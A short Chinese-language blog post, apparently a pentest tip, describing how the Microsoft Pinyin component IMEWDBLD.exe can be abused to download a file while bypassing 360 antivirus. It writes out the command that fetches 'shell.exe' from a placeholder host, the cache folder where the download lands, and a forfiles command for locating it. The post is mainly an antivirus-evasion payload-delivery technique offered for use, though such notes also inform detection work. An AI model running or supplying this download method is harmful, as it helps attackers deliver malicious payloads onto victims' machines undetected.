IMEWDBLD.exe ByPass360 下载文件
This_is_Y Lv6

参考:https://mp.weixin.qq.com/s/AvhN1iEqL_LcIU9mNwoFBg

IMEWDBLD.exe是微软拼音的开放扩展字典模块,主要用来下载字典文件,在Windows中主要存在路径为:C:\Windows\System32\IME\SHARED\IMEWDBLD.exe

下载命令为

C:\Windows\System32\IME\SHARED\IMEWDBLD.exe http://xxxxx/shell.exe

下载后的存放路径为

C:\Users\%username%\AppData\Local\Microsoft\Windows\INetCache\IE\[随机值]

下载时会弹出报错,不用管

image-20210709103503656

下载后找到文件位置(主要是为了找到这个随机值)
forfiles /P “%localappdata%\Microsoft\Windows\INetCache” /S /M * /C “cmd /c echo @path”

    参数介绍
/P 表示开始搜索的路径。默认文件夹是当前工作的 目录 (.)。
/S 指导 forfiles 递归到子目录。像 "DIR /S"。
/M 根据搜索掩码搜索文件。默认搜索掩码是 '*'。
/C 表示为每个文件执行的命令。命令字符串应该用双引号括起来。
@path 返回文件的完整路径

一般下载后,就会名字后面会多一个[1]

image-20210709103653910

image-20210709103558230

 Comments